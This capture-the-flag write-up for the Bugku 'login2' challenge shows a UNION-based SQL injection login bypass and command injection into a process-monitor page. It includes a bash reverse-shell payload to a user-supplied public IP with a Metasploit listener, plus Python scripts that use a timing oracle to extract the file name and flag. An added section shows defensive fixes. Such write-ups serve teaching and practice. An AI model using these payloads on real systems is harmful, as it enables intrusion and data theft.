CTF – SKCTF – login2

Challenge description

Source: ctf.bugku.com

Direct link: http://118.89.219.210:49165/

Solution steps

Login bypass with UNION

The challenge presents a login page. Viewing the page source and capturing the request with Burp Suite reveals a tip in an HTTP header:

JHNxbD0iU0VMRUNUIHVzZXJuYW1lLHBhc3N3b3JkIEZST00gYWRtaW4gV0hFUkUgdXNlcm5hbWU9JyIuJHVzZXJuYW1lLiInIjsKaWYgKCFlbXB0eSgkcm93KSAmJiAkcm93WydwYXNzd29yZCddPT09bWQ1KCRwYXNzd29yZCkpewp9

Base64-decoding it gives a fragment of the server-side source:

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

The source shows that the username and password are verified in two separate steps: the query looks up the row by username only, and PHP then compares the stored password column with md5() of the submitted password. Following the hint (union), we build a payload with a non-existent user, so the only row returned is the UNION row we supply, whose password column is a hash we choose, and log in with it:

username=admin' union select 1,md5(1)#&password=1

Brute-forcing through command execution

After logging in we land on a process monitoring page. Submitting 123 returns:

apache 22446 0.0 0.0 11352 180 ? R 11:42 0:00 sh -c ps -aux | grep 123

Submitting 123;ls returns:

apache 22449 0.0 0.0 11352 176 ? R 11:43 0:00 sh -c ps -aux | grep 123;ls

The page shows no further output, so either the command ran and its output was filtered, or the command itself was filtered.
Submitting 123;sleep 5 makes the page take 5.83 s to respond, which shows that the command was executed and only its output is suppressed.
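As an added example that is not part of the original writeup, here is how the two server-side bugs used above (the string-concatenated username in the login query, and the raw `c` parameter handed to `sh -c "ps -aux | grep ..."`) would be closed, written in Python as a stand-in for the challenge's PHP. The in-memory admin table, the function names and the allow-list pattern are assumptions.

```python
import hashlib
import hmac
import re
import sqlite3
import subprocess


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge's admin table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    con.execute("INSERT INTO admin VALUES (?, ?)", ("admin", md5_hex("s3cret")))
    return con


def authenticate(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Safe counterpart of the leaked login check. The username is bound as a
    parameter, so "admin' union select 1,md5(1)#" is compared as a literal
    string and matches no row: the attacker can no longer inject a row whose
    password column they control."""
    row = con.execute(
        "SELECT username, password FROM admin WHERE username = ?", (username,)
    ).fetchone()
    # md5 is kept only to mirror the challenge; store a slow password hash instead.
    return row is not None and hmac.compare_digest(row[1], md5_hex(password))


# Allow-list for the process-monitor filter: PID or process-name characters only.
_FILTER_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def is_safe_filter(c: str) -> bool:
    """False for anything containing ';', '`', '$', '|', quotes or spaces,
    i.e. every payload shown in this writeup."""
    return _FILTER_RE.fullmatch(c) is not None


def filter_lines(ps_output: str, c: str) -> list:
    """The `grep c` step done in Python instead of a shell pipeline."""
    return [line for line in ps_output.splitlines() if c in line]


def list_matching_processes(c: str) -> list:
    """Safe counterpart of sh -c "ps -aux | grep $c": argv list, no shell."""
    if not is_safe_filter(c):
        raise ValueError("rejected process filter: %r" % c)
    out = subprocess.run(["ps", "aux"], capture_output=True, text=True, check=True).stdout
    return filter_lines(out, c)
```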

Getting the flag

1. Reverse shell

This requires a VPS with a public IP; if you do not have one, see the second method.

payload:

c=123 ; bash -i >& /dev/tcp/(your public IP)/6666 0>&1

msf listener on the VPS:

use exploit/multi/handler
set payload linux/armle/shell/reverse_tcp
set lport 6666
set lhost <your public IP>
set exitonsession false
exploit -j

Once the shell connects back, list the directory (ls) and read (cat) the flag file to get the flag.

2. Brute force

If a reverse shell is not possible, borrow the idea of blind SQL injection and brute-force through the command execution instead.

Key injection statement

123;a=`ls`;b='a';if [ ${a:0:1} == $b ];then sleep 2;fi

ls lists the files in the current directory; if the first character equals 'a', the response is delayed by two seconds, which gives us a time-based blind oracle.

Code to brute-force the file name

Python3

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: virgin-forest
# Time: 2018-08-16 19:33:49
# Describe: recover the file name in the web root one character at a time
#           through the sleep-based time oracle in the "c" parameter

import time
import requests


def get_session():
    # Log in through the UNION bypass and return the session cookie
    data = {
        "username": "' union select md5(1),md5(1)#",
        "password": "1",
    }

    r = requests.post('http://118.89.219.210:49165/login.php', data=data)

    cookie = r.headers['Set-Cookie']
    cookie = cookie.split(';')[0]
    return cookie


def get_file_name(session):
    chars = 'abcdefghijklmnopqrstuvwxyz _.1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ{}+-*/='

    data = {
        "c": "",
    }

    header = {
        "Cookie": session
    }
    # Characters recovered so far; seed this with a partial result to resume
    # an interrupted run (the loop continues from len(ch))
    ch = ''
    for i in range(len(ch), 36):
        for char in chars:
            # ${a:i:1} is the i-th character of `ls`; sleep 2 when it equals b
            # (data['c'] already supplies the parameter name, so no "c=" prefix)
            payload = "123;a=`ls`;b='%s';if [ ${a:%d:1} == $b ];then sleep 2;fi" % (char, i)

            data['c'] = payload
            start = time.time()
            r = requests.post('http://118.89.219.210:49165/index.php', data=data, headers=header)
            end = time.time()
            reti = abs(start - end)
            if reti > 3.0 and reti < 5:  # adjust these bounds to your network latency
                ch += char
                print(i, ch, reti)
                break


get_file_name(get_session())

File name brute-force result

0 c 3.404446601867676
1 cs 3.3876683712005615
...
34 css fLag_c2Rmc2Fncn-MzRzZGZnNDc.txt 3.37492966651916
35 css fLag_c2Rmc2Fncn-MzRzZGZnNDc.txth 4.1884589195251465

From the output, the file name is fLag_c2Rmc2Fncn-MzRzZGZnNDc.txt (why does this name have to be so long???)

Brute-forcing absolutely needs a good network connection!!!
I had to repeat the brute force several times before it came out right!!!
I almost cried!!!
China Telecom is garbage!!!

Code to brute-force the flag

Python3

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: virgin-forest
# Time: 2018-08-16 19:33:49
# Describe: read the flag file one character at a time through the same
#           sleep-based time oracle, using `cat` instead of `ls`

import time
import requests


def get_session():
    # Log in through the UNION bypass and return the session cookie
    data = {
        "username": "' union select md5(1),md5(1)#",
        "password": "1",
    }

    r = requests.post('http://118.89.219.210:49165/login.php', data=data)

    cookie = r.headers['Set-Cookie']
    cookie = cookie.split(';')[0]
    return cookie


def get_flag(session):
    chars = 'abcdefghijklmnopqrstuvwxyz _.1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ{}@+-*/='

    data = {
        "c": "",
    }

    header = {
        "Cookie": session
    }
    # Characters recovered so far; seed this with a partial result to resume
    # an interrupted run (the loop continues from len(ch))
    ch = ''
    for i in range(len(ch), 29):
        for char in chars:
            # ${a:i:1} is the i-th character of the file; sleep 2 when it equals b
            # (data['c'] already supplies the parameter name, so no "c=" prefix)
            payload = "123;a=`cat fLag_c2Rmc2Fncn-MzRzZGZnNDc.txt`;b='%s';if [ ${a:%d:1} == $b ];then sleep 2;fi" % (char, i)

            print('[+] ' + payload)
            data['c'] = payload
            start = time.time()
            r = requests.post('http://118.89.219.210:49165/index.php', data=data, headers=header)
            end = time.time()
            reti = abs(start - end)

            if reti > 2.0 and reti < 5:  # adjust these bounds to your network latency
                ch += char
                print(i, ch, reti)
                break


get_flag(get_session())

Flag brute-force result

0 S 3.436304807662964
1 SK 3.386700391769409
...
27 SKCTF{Uni0n_@nd_c0mM4nD_exEc 3.097593307495117
28 SKCTF{Uni0n_@nd_c0mM4nD_exEc} 3.8327322006225586

Although I got the flag in the end,
I still want to say:
China Telecom really is garbage!!!